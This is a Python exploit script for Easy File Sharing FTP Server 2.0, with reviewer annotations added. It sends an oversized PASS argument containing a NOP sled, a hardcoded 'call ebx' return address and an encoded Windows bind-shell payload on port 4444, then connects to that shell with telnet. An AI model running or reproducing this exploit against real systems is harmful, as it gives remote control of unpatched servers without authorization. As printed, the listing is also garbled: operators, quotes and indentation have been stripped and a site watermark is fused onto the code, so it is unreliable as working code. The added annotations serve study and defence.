Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit


#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas 🙂

import os

import sys

import time

import struct

import socket

# Windows bind-shell payload; the file header above says it listens on TCP
# port 4444. After the first line the bytes are almost all in 0x30-0x5a, so
# this looks like an alphanumeric-encoded payload with a short decoder stub
# in front — TODO confirm, the page does not say which encoder was used.
# NOTE(review): every line below is printed as `shellcode = ...`, which as
# written would overwrite the previous line rather than extend it; the
# cumulative `+=` has almost certainly been lost in extraction, as were the
# `+` operators and indentation further down. The blob is kept unchanged.
shellcode = "\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"

shellcode = "\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"

shellcode = "\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"

shellcode = "\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"

shellcode = "\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e"

shellcode = "\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x46\\x4b\\x48"

shellcode = "\\x4e\\x56\\x46\\x42\\x46\\x42\\x4b\\x48\\x45\\x34\\x4e\\x33\\x4b\\x38\\x4e\\x37"

shellcode = "\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x31\\x4b\\x38"

shellcode = "\\x4f\\x45\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x33\\x4b\\x38"

shellcode = "\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c"

shellcode = "\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x50\\x44\\x4c\\x4b\\x4e"

shellcode = "\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x32\\x4a\\x52\\x45\\x47\\x45\\x4e\\x4b\\x58"

shellcode = "\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x34"

shellcode = "\\x4b\\x38\\x4f\\x45\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x42\\x4b\\x48"

shellcode = "\\x49\\x38\\x4e\\x46\\x46\\x52\\x4e\\x31\\x41\\x36\\x43\\x4c\\x41\\x43\\x4b\\x4d"

shellcode = "\\x46\\x36\\x4b\\x48\\x43\\x34\\x42\\x53\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58"

shellcode = "\\x42\\x47\\x4e\\x31\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x30\\x50\\x55\\x4a\\x56"

shellcode = "\\x50\\x38\\x50\\x44\\x50\\x30\\x4e\\x4e\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x48\\x36"

shellcode = "\\x43\\x35\\x48\\x36\\x4a\\x36\\x43\\x43\\x44\\x43\\x4a\\x36\\x47\\x37\\x43\\x57"

shellcode = "\\x44\\x53\\x4f\\x35\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x4b\\x4c\\x4d\\x4e"

shellcode = "\\x4e\\x4f\\x4b\\x43\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x48\\x45\\x4e"

shellcode = "\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x55\\x4c\\x56\\x44\\x30"

shellcode = "\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55"

shellcode = "\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\\x43\\x45\\x43\\x35\\x43\\x35\\x43\\x44"

shellcode = "\\x43\\x55\\x43\\x44\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x56\\x41\\x31"

shellcode = "\\x4e\\x45\\x48\\x36\\x43\\x55\\x49\\x58\\x41\\x4e\\x45\\x39\\x4a\\x56\\x46\\x4a"

shellcode = "\\x4c\\x51\\x42\\x47\\x47\\x4c\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31"

shellcode = "\\x41\\x35\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42"

shellcode = "\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d"

shellcode = "\\x4a\\x46\\x45\\x4e\\x49\\x44\\x48\\x58\\x49\\x54\\x47\\x45\\x4f\\x4f\\x48\\x4d"

shellcode = "\\x42\\x35\\x46\\x45\\x46\\x55\\x45\\x45\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x56"

shellcode = "\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55"

shellcode = "\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x46\\x46\\x46\\x48\\x46\\x4a\\x36\\x43\\x46"

shellcode = "\\x4d\\x46\\x49\\x58\\x45\\x4e\\x4c\\x46\\x42\\x35\\x49\\x35\\x49\\x32\\x4e\\x4c"

shellcode = "\\x49\\x38\\x47\\x4e\\x4c\\x36\\x46\\x34\\x49\\x38\\x44\\x4e\\x41\\x53\\x42\\x4c"

shellcode = "\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x44\\x4d\\x52\\x50\\x4f\\x44\\x44\\x4e\\x32"

shellcode = "\\x43\\x59\\x4d\\x38\\x4c\\x57\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46"

shellcode = "\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\\x4f\\x4f\\x45\\x47\\x46\\x34\\x4f\\x4f"

shellcode = "\\x48\\x4d\\x4b\\x35\\x47\\x45\\x44\\x55\\x41\\x45\\x41\\x45\\x41\\x55\\x4c\\x36"

shellcode = "\\x41\\x30\\x41\\x35\\x41\\x45\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x46"

shellcode = "\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x46"

shellcode = "\\x4f\\x4f\\x4f\\x4f\\x47\\x43\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x55\\x4e\\x4f"

shellcode = "\\x43\\x58\\x46\\x4c\\x46\\x56\\x4f\\x4f\\x48\\x4d\\x44\\x45\\x4f\\x4f\\x42\\x4d"

shellcode = "\\x4a\\x56\\x4f\\x4e\\x50\\x4c\\x42\\x4e\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d"

shellcode = "\\x4f\\x4f\\x42\\x4d\\x5a"

def ConnectRemoteShell(target):

# Attach to the listener the payload is described (file header) as opening
# on the target's TCP port 4444, by launching the system telnet client.
# NOTE(review): the `+` between the three string pieces is missing as
# printed (extraction damage); the original was a plain concatenation.
# NOTE(review): `target` comes straight from argv and is spliced into a
# shell command line unescaped — os.system() hands the string to /bin/sh,
# so an argument containing shell metacharacters would be interpreted by
# the operator's own shell. A list-form subprocess call avoids that.
# This helper is defined but never called from the __main__ block below.
connect = "/usr/bin/telnet " target " 4444"

os.system(connect)

def ExploitFTP(target):

# Send the oversized PASS argument that triggers the overflow (the title
# names the PASS handler as the vulnerable path). Flow: TCP connect to
# port 21, read the banner, build the payload, send USER anonymous, then
# send PASS with the payload as the password. Because the payload *is* the
# password, the vulnerable code runs before any authentication succeeds.
# NOTE(review): as printed, the `+=`/`+` operators and the body indentation
# have been stripped and quotes rendered as \’ — this listing does not
# parse; it documents the author's layout, not runnable code.
sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# No timeout is set and the socket is never closed; every recv() below
# blocks until the server answers (or forever if it has already crashed).
tsock.connect(sockAddr)

response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

# Payload layout as laid out by the author: 2553 filler bytes, a short NOP
# run ending in a forward jump, a 4-byte return address, 83 more NOPs, then
# the shellcode. Each `payload =` below was a `+=` in the original.
payload = \’A\’ * 2553

# NOP\’s pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = \’\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x0f\’

# Address of \’call ebx\’ from kernel32.dll SP4

# A fixed module address ties the exploit to one OS/service-pack build
# (Win2K SP4 per the author); the alternate XP SP2 address is commented out.
payload = struct.pack(\'<L\’, 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack(\'<L\’, 0x71AB1269)

payload = \’\\x90\’ * 83

payload = shellcode

# Anonymous login; only the USER step is sent before the malicious PASS.
user = \’USER anonymous\\r\\n\’

tsock.send(user)

response = tsock.recv(1024)

print response

# A single 0x2c (',') byte precedes the payload; the page does not say why.
# Defender note: a PASS argument well over 2.6 KB dominated by 0x41/0x90
# runs is far outside anything a real client sends — a length limit on the
# PASS argument at the server, or an FTP control-channel IDS rule on
# argument length, catches this class of input trivially.
passwd = \’PASS \\x2c\’ payload \’\\r\\n\’

tsock.send(passwd)

response = tsock.recv(1024)

print response

if __name__ == \’__main__\’:

# Entry point: the single positional argument is the target host. A missing
# argument prints the usage line and exits with -1 (255 on POSIX shells).
try:

target = sys.argv[1]

except IndexError:

print \’Usage: %s <target>\’ % sys.argv[0]

sys.exit(-1)

# NOTE(review): the `//http://www.leftworld.net` suffix on the next line is
# a site watermark fused onto the code during extraction, not part of the
# script. ConnectRemoteShell is never invoked here.
ExploitFTP(target)//http://www.leftworld.net
